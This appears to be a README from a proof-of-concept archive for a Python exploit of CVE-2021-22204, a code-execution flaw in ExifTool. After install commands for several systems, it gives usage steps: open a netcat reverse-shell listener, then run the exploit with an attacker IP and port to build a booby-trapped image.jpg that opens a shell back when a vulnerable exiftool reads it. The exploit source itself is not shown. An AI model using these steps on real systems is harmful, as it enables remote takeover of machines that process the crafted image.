exiftool exploit# CVE-2021-22204-exiftool
Python exploit for the CVE-2021-22204 vulnerability in Exiftool.
# Video tutorial
## Youtube
404 notfound
## Requirements
python3 python3-pip djvulibre-bin exiftool
# Install requirements
## Debian
apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip
## Ubuntu
apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip
## Arch Linux
pacman -S djvulibre libimage-exiftool-perl python python-pip
## Kali Linux
apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip
## Fedora
dnf install djvulibre libimage-exiftool-perl python-minimal python-pip
## OS X
brew install djvulibre exiftool python
## Raspbian
apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip
# How to run:
## Install python requirements
sudo pip install -r requirements.txt
## start reverse shell with natcat
nc -nvlp 4444
## Give execute permission
chmod +x exploit.py
## Run program
python3 exploit.py {Your IP add adress} {Your Listening port}
### OR
./exploit.py {Your IP add adress} {Your Listening port}
## Example
python3 exploit.py 192.168.0.1 4444
### OR
./exploit.py 192.168.0.1 4444
## Output file name is
image.jpg
# About the vulnerability
The CVE-2021-22204 was discovered and reported by William Bowling. (@wcbowling)
This exploit was made by studying the exiftool patch after the CVE was already reported.
And the image.jpg will trigger the vulnerability when opened with a vulnerable exiftool.
[4.0K] /data/pocs/7163951b5b882f164392f173ef0cb92c746123f5
├── [ 69K] exploit.py
├── [1.7K] README.md
└── [ 58] requirements.txt
0 directories, 3 files